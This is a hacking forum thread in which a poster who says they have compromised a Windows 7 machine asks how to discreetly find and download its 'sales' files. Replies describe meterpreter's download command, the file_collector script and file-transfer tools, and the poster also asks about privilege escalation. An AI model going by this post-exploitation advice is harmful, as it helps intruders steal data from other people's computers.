So I've compromised a windows 7 system(system priv and all) and would like to download files directly from his computer to mine. Is it possible to write a script that would search his computer for any files titled sales and download them? I couldn't find anything in the ultimate list of meterpreter scripts. Google searches have led me to find veil-pillage's Remote Desktop tool as a possible option but there has to be a more discreet way. Thanks in advance.
- Hot
- Active
-
Forum Thread: Hack and Track People's Device Constantly Using TRAPE 35 Replies
6 hrs ago -
Forum Thread: How to Hack an Android Device with Only a Ip Adress 51 Replies
6 hrs ago -
Forum Thread: Bypassing DeepFreeze Without Reseting the Password? 5 Replies
12 hrs ago -
Forum Thread: How to Hack CCTV Private Cameras 68 Replies
1 wk ago -
Forum Thread: Hacking Facebook,Twitter,Instagram Account Passwords with BruteForce 164 Replies
3 wks ago -
Forum Thread: How to Gain Access to an Android Over WAN 24 Replies
4 wks ago -
Forum Thread: Discord Channel 3 Replies
1 mo ago -
Forum Thread: Complete Guide to Creating and Hosting a Phishing Page for Beginners 50 Replies
1 mo ago -
Forum Thread: HELP I Created an Apk for Hacking My Phone Using Kali Linux in Virtual Box How Can I Install That Apk on My Phone 18 Replies
2 mo ago -
Forum Thread: Mitm attack problem 2 Replies
2 mo ago -
Metasploit Error: Handler Failed to Bind 40 Replies
2 mo ago -
Forum Thread: How to Know if You Are a Script Kiddie? 9 Replies
3 mo ago -
Forum Thread: How to Identify and Crack Hashes 8 Replies
3 mo ago -
Forum Thread: How to Hack School Website 8 Replies
3 mo ago -
Forum Thread: Whenever I Try "Airmon-Ng Start wlan0" There's an Error? 16 Replies
3 mo ago -
Forum Thread: How to Fix 'Failed to Detect and Mount CD-ROM' Problem When Installing Kali Linux 14 Replies
3 mo ago -
Forum Thread: Awesome Keylogging Script - BeeLogger 30 Replies
3 mo ago -
Forum Thread: How to Hack Android Phone Using Same Wifi 27 Replies
3 mo ago -
Forum Thread: Create and Use Android/Meterpreter/reverse_tcp APK with Msfvenom? 121 Replies
4 mo ago -
How to: Minecraft DoS'Ing with Python. 1 Replies
5 mo ago
-
How To: Brute-Force FTP Credentials & Get Server Access
-
How to Hack Wi-Fi: Cracking WPA2 Passwords Using the New PMKID Hashcat Attack
-
Tutorial: Create Wordlists with Crunch
-
Hacking Windows 10: How to Dump NTLM Hashes & Crack Windows Passwords
-
How To: Check if Your Wireless Network Adapter Supports Monitor Mode & Packet Injection
-
How To: Crack Shadow Hashes After Getting Root on a Linux System
-
How To: Create a Persistent Back Door in Android Using Kali Linux:
-
How To: Find Identifying Information from a Phone Number Using OSINT Tools
-
How To: Scan for Vulnerabilities on Any Website Using Nikto
-
Hack Like a Pro: How to Crack Online Web Form Passwords with THC-Hydra & Burp Suite
-
How to Hack Wi-Fi: Cracking WPA2-PSK Passwords Using Aircrack-Ng
-
How to Hack Wi-Fi: Get Anyone's Wi-Fi Password Without Cracking Using Wifiphisher
-
How To: Crack SSH Private Key Passwords with John the Ripper
-
How To: Hack Android Using Kali (Remotely)
-
How To: The Hacks Behind Cracking, Part 1: How to Bypass Software Registration
-
How To: Use SQL Injection to Run OS Commands & Get a Shell
-
How to Hack Wi-Fi: Stealing Wi-Fi Passwords with an Evil Twin Attack
-
How To: Make Spoofed Calls Using Any Phone Number You Want Right from Your Smartphone
-
How To: Find Vulnerable Webcams Across the Globe Using Shodan
-
How To: Buy the Best Wireless Network Adapter for Wi-Fi Hacking in 2019
10 Responses
You could script netcat, but downloading multiple files would be complicated.
SSH is not a reliable way in this case.
I searched for some meterpreter scripting.
http://www.offensive-security.com/metasploit-unleashed/Custom_Scripting
Basically you could write a ruby script to locate all the "sales" files and then download them with meterpreter
Searching deeper I found another solution:
You can download files with meterpreter with the syntax:
meterpreter> download WINDOWSPATH LINUXPATH (in case you are using Kali)
But there's more!
You can create a list of files to download.
NOTE:I've never done this before, so I don't know if it actually works, people with more knowledge may confirm, thank you.
If you know the extension of the sals files, this will be easier.
To create the list, run the file collector script with this syntax (once you got the meterpreter shell):
Where -d means directory,use -r if you want to search in sub-folders, use -f if you want to search for specific extensions (-r -f anyfile.txt -o ecc...), that fits perfectly if you know the file type and if it is different from common ones.
Where WDP is the path of the directory, so if you know where the sales files are just write down the complete path, if you don't, generally go with "C:\\".
Where LDP (for example /root/filelist.txt) is the directory you want the filelist to be written to (-o) in your linux machine (in case you are using Kali).
Now that you have a list of files, you can start downloading them:
So if you want to search for files that have "sales" in the name, I guess you could make the WDP something like this, however i'm not 100% sure this will work, waiting for confirm:
If you want more on meterpreter scripting, there's "Metasploit Unleashed", an online free "course" to metasploit.
But before trying this, you should wait for confirm, however there's documentation online.
EDIT: found this article that explains it easier, I hope this is not spam:http://www.vidsploit.com/meterpreter/search-for-interesting-files/
Q:Is there a way to write the "anything symbol" in these posts?
To answer your question, any special formatting characters can simply be typed twice if you want them to show up in your comments. So if you want to type an asterix (*), just type it twice in a row ("**") and it will appear as a single asterix once you submit your comment. The same goes for underscores and square brackets.
@Bryan: That's great, any way to get code (box) formatting in the text editor? I would love to make more technical guides on exploits, plus it would look cooler..
@CIUFFY: I like that detail.
@Alex: You can search source forge for pillage modules for MSF if you have too. Good Luck. Got System?
In this case I had system becuase I had admin rights, but what do you do if you have a Meterpreter shell with user rights on a patched system? I'm attacking a Windows 7 SP1 machine so I used kiTrap0D and schelevator but they aren't working. Are there any ways to get the hashes as user or are modern exploits I'm missing? I found a tutorial on fuzzysecurity.com that explains priv escalation and am wondering if there are any easier ways than going though all those steps.
Another question, why would non-server windows systems ever be unpatched? Don't all windows systems update without asking you whenever Microsoft rolls out an update? I'd understand if people torrented windows on a large scale but most have legitimate copies of it and as far as I know you can't opt-out of updates.
Greetings, let me answer in reverse.
exit
I got NT AUTHORITY\SYSTEM earlier but I can only do it from admin privilege, I get stuck unable to get SYSTEM when I start with user. The question you're responding to doesn't have much to do with the original one, they we're just additional question I had that I felt didn't warrant a new thread.
Could be a VM.. You did have msf check for VM. Yes?
I'm targeting a laptop right beside me. Sorry for not mentioning that. I didn't know about just how many people torrented windows though. Thanks for the info.
Alex:
Just a comment about updating. Many commercial entities disable updating on their production systems because they don't want the system offline. In addition, updates will often "break" a system and many firms delay updates until they can test them in a offline environment. As a result, MANY systems don't get updated.
OTW
*Thank you!*
@CyberHitchHiker: Yeah I do, I'll be sure to check around for good pillage modules as I assumed any good modules came with MSF.
@CIUFFY: Thanks a lot! I'll be sure to report back the results when I get back to my computer.
Alex:
Meterpreter has an upload and download function for moving files. In addition, consider ftp and tftp as well as netcat and hping for moving files.
OTW
Share Your Thoughts